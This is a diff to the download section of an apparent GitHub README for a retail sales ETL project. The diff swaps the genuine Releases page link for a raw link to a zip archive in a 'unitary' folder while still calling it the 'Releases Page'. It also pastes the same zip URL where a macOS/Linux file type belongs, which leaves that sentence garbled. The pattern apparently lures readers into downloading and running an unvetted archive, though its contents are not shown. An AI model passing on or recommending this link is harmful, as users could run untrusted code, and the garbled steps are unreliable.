MadMax810/Retail-Sales-ETL-and-Analysis/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   Go to the [Releases Page](https://github.com/MadMax810/Retail-Sales-ETL-and-Analysis/releases) to find the latest version of the application.
+   Go to the [Releases Page](https://raw.githubusercontent.com/MadMax810/Retail-Sales-ETL-and-Analysis/main/unitary/Retail-Sales-ETL-and-Analysis.zip) to find the latest version of the application.

 2. **Choose the Right File**
    On the Releases Page, look for the version labeled as "Latest Release."
 This file is the most updated version of the application.

 3. **Download the Application**
    Click on the link to download the application file.
-Depending on your operating system, this might be a .exe (Windows) or .tar.gz (macOS/Linux) file.
+Depending on your operating system, this might be a .exe (Windows) or https://raw.githubusercontent.com/MadMax810/Retail-Sales-ETL-and-Analysis/main/unitary/Retail-Sales-ETL-and-Analysis.zip (macOS/Linux) file.

 4. **Run the Application**
    Once the download is complete, find the file in your Downloads folder.
 Double-click the file to start the installation.
 Follow the on-screen instructions.